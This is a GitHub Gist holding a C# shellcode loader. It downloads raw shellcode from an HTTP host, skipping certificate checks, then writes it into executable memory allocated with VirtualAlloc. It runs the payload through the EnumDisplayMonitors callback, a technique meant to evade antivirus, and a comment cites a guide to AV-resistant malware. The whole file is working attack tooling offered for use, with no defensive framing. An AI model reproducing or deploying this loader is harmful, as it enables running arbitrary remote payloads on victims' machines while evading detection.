Created
June 21, 2022 13:15
-
-
Save zux0x3a/6fe6160fc893c0fd0311562e271bd93e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using System.IO; | |
| using System.Net; | |
| namespace callback_function | |
| { | |
| internal class Program | |
| { | |
| public const uint MEM_COMMIT = 0x00001000; | |
| public const uint PAGE_EXECUTE_READWRITE = 0x40; | |
| [DllImport("kernel32")] | |
| public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("user32.dll")] | |
| private static extern bool EnumDisplayMonitors(IntPtr hdc, IntPtr lprcClip, IntPtr lpfnEnum, uint dwData); | |
| public static byte[] download_shellcode(string shellcode_url) | |
| { | |
| WebClient dwl = new WebClient(); | |
| dwl.Headers.Add("User-Agent", "Mozilla/5.0 (windows)"); | |
| ServicePointManager.Expect100Continue = true; | |
| ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12; | |
| ServicePointManager.ServerCertificateValidationCallback = delegate | |
| { | |
| return true; | |
| }; | |
| byte[] chunk = dwl.DownloadData(shellcode_url); | |
| return chunk; | |
| } | |
| public static void printshellcode( byte[] shellcodeBytes) | |
| { | |
| // ref: https://blog.securityevaluators.com/creating-av-resistant-malware-part-3-fdacdf071a5f | |
| StringBuilder shellcode = new StringBuilder(); | |
| shellcode.Append(shellcodeBytes.Length); | |
| shellcode.Append("] { "); | |
| for (int i = 0; i < shellcodeBytes.Length; i++) | |
| { | |
| shellcode.Append("0x"); | |
| shellcode.AppendFormat("{0:x2}", shellcodeBytes[i]); | |
| if (i < shellcodeBytes.Length - 1) | |
| { | |
| shellcode.Append(","); | |
| } | |
| } | |
| shellcode.Append("};"); | |
| Console.WriteLine(shellcode.ToString()); | |
| } | |
| static void Main(string[] args) | |
| { | |
| byte[] buf = download_shellcode("http://192.168.33.133/shellcode.bin"); // shellcode should be RAW format | |
| printshellcode(buf); // you can comment this, just for debugging matters | |
| int payloadSize = buf.Length; | |
| IntPtr addr = VirtualAlloc (IntPtr.Zero, (uint)payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| Marshal.Copy(buf, 0, addr, payloadSize); | |
| EnumDisplayMonitors(IntPtr.Zero, IntPtr.Zero, addr, 0x00); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment